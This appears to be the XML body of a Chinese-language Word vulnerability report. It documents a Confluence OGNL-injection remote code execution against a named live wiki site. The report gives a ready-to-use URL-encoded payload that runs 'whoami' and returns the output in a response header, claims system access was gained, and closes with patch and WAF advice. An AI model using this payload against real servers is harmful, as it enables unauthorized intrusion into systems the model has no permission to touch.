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B03D" w14:textId="70D49DD9" w:rsidR="00C46ACA" w:rsidRDefault="00F81506" w:rsidP="00AF56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访问域名</w:t>
      </w:r>
      <w:r w:rsidR="00C46ACA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来到</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00370301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正源德标</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00370301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WIKI后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A428E39" w14:textId="18AE6559" w:rsidR="00370301" w:rsidRDefault="00370301" w:rsidP="00F81506">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E055C6">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://wiki.ebidding.xin/login.action?os_destination=%2Findex.action&amp;permissionViolation=true</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0528830B" w14:textId="27B873E3" w:rsidR="00F81506" w:rsidRDefault="00370301" w:rsidP="00F81506">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22919C20" wp14:editId="197C7D9A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0851" w14:textId="30AB756F" w:rsidR="00F81506" w:rsidRDefault="00370301" w:rsidP="00F8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F81506">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用burp进行抓包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将其发送到Repeat模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4272A2EA" w14:textId="592AD8DB" w:rsidR="00F81506" w:rsidRDefault="00370301" w:rsidP="00F81506">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BCE2545" wp14:editId="725D52D3">
            <wp:extent cx="5274310" cy="1913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4AC" w14:textId="1954D1E9" w:rsidR="00F81506" w:rsidRDefault="00F81506" w:rsidP="00F8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进行替换payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BA9A0" w14:textId="2B19B7CD" w:rsidR="00F81506" w:rsidRDefault="00C46ACA" w:rsidP="00F81506">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C46ACA">
        <w:t>/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C46ACA">
        <w:t>40java.lang.Runtime</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C46ACA">
        <w:t>%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD8C15" w14:textId="4EFF7356" w:rsidR="00F81506" w:rsidRDefault="00370301" w:rsidP="00F815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11BAF" wp14:editId="0FFD1970">
            <wp:extent cx="5274310" cy="2226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8B20" w14:textId="6AAA72DD" w:rsidR="00370301" w:rsidRDefault="00370301" w:rsidP="00F815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可以任意执行语句，获得系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65562A51" w14:textId="20E1EA2D" w:rsidR="00370301" w:rsidRDefault="00117093" w:rsidP="00F815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E17121" wp14:editId="57EB13AD">
            <wp:extent cx="5274310" cy="2089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3E27" w14:textId="0D7C27B8" w:rsidR="00F81506" w:rsidRDefault="00F81506" w:rsidP="00F81506">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0C7AE8" w14:textId="4CD417E8" w:rsidR="00F81506" w:rsidRDefault="00F81506" w:rsidP="00F81506">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6462A2" w14:textId="0D98BDF1" w:rsidR="00F81506" w:rsidRDefault="00F81506" w:rsidP="00F81506">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功造成远程代码执行漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00F2511A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB79CD" w14:textId="420C2521" w:rsidR="00E8700B" w:rsidRDefault="00E8700B" w:rsidP="00F81506">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F9394E" w14:textId="084A5238" w:rsidR="00E8700B" w:rsidRDefault="00E8700B" w:rsidP="00F81506">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00E8700B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽快更新至修复版本，安装补丁</w:t>
      </w:r>
      <w:r w:rsidRPr="00E8700B">
        <w:t>https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html，设置</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E8700B">
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E8700B">
        <w:t>等等</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E8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264"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63A05722"/>
    <w:lvl w:ilvl="0" w:tplc="586C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29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FD"/>
    <w:rsid w:val="00117093"/>
    <w:rsid w:val="00214AFD"/>
    <w:rsid w:val="00370301"/>
    <w:rsid w:val="0038777D"/>
    <w:rsid w:val="003D1536"/>
    <w:rsid w:val="004A6932"/>
    <w:rsid w:val="006551C2"/>
    <w:rsid w:val="00C46ACA"/>
    <w:rsid w:val="00D3346E"/>
    <w:rsid w:val="00E62C6A"/>
    <w:rsid w:val="00E8700B"/>
    <w:rsid w:val="00F2511A"/>
    <w:rsid w:val="00F8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436"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E7EA6B2B-C2EB-42F4-8A89-C09630DC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15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iki.ebidding.xin/login.action?os_destination=%2Findex.action&amp;permissionViolation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C</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>李 C</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-06T15:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-07T02:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>